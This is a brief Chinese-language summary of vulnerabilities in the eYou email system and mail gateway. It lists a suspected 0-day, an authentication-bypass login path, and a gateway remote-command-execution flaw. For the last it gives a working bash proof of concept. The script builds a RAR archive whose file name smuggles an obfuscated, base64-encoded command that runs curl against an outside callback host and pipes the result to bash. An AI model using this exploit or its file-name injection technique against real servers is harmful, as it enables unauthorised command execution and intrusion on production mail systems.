亿邮相关漏洞总结

1. 亿邮电子邮件系统远程命令执行漏洞

   1. 　　疑似0day，未知详情

2. 亿邮电子邮件系统认证逻辑缺陷

   1. 　　利用路径：/?q=login.do

3. 亿邮邮件网关 RCE

   1. 利用路径：/usr/local/eyou/gateway/ebaselib/bin/pdftotext
   2. 验证方式：

      #!/bin/bash
      PAYLOAD_NAME="testpoc.pdf\`{echo Y3VybCBodHRwOi8vc2R5eWE0Mm4uZG5zLmFkeXNlYy5jb20K}|{base64 -d}|bash\`"
      WORKDIR=$(mktemp -d)
      cd "$WORKDIR" || exit 1
      echo -n "12345" > "$PAYLOAD_NAME"
      OUTPUT_RAR="payload_testpoc.rar"
      rar a -ma5 -m0 -ep "$OUTPUT_RAR" "$PAYLOAD_NAME"
      mv "$OUTPUT_RAR" "$OLDPWD"
      echo "[+] Done: $OUTPUT_RAR created."
      rm -rf "$WORKDIR"